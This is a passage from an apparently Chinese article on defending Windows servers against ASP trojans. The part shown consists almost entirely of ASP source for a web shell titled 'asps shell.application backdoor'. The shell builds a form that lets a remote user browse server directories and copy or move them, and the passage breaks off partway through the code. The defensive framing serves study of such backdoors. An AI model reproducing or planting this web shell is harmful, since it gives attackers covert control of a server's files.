Windows服务器防范ASP木马(3) <%response.write now()%><BR>程序所在的物理路径: <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> <html> <title>asps shell.application backdoor </title> <body> <form action="<%= Request.ServerVariables("URL") %>" method="POST"> <input type=text name=text value="<%=szCMD %>"> 输入要浏览的目录<br> <input type=text name=text1 value="<%=szCMD1 %>"> copy <input type=text name=text2 value="<%=szCMD2 %>"><br> <input type=text name=text3 value="<%=szCMD3 %>"> move <input type=text name=text4 value="<%=szCMD4 %>"><br> 路径:<input type=text name=text5 value="<%=szCMD5 %>"> 程序:<input type=text name=text6 value="<%=szCMD6 %>"><br> <input type=submit name=sb value=发送命令> </form> </body> </html> <% szCMD = Request.Form("text") 目录浏览 if (szCMD <> "") then set shell=server.createobject("shell.application") 建立shell对象 set fod1=shell.namespace(szcmd) set foditems=fod1.items for each co in foditems response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>" next end if %> <% szCMD1 = Request.Form("text1") 目录拷贝,不能进行文件拷贝 szCMD2 = Request.Form("text2") if szcmd1<>"" and szcmd2<>"" then
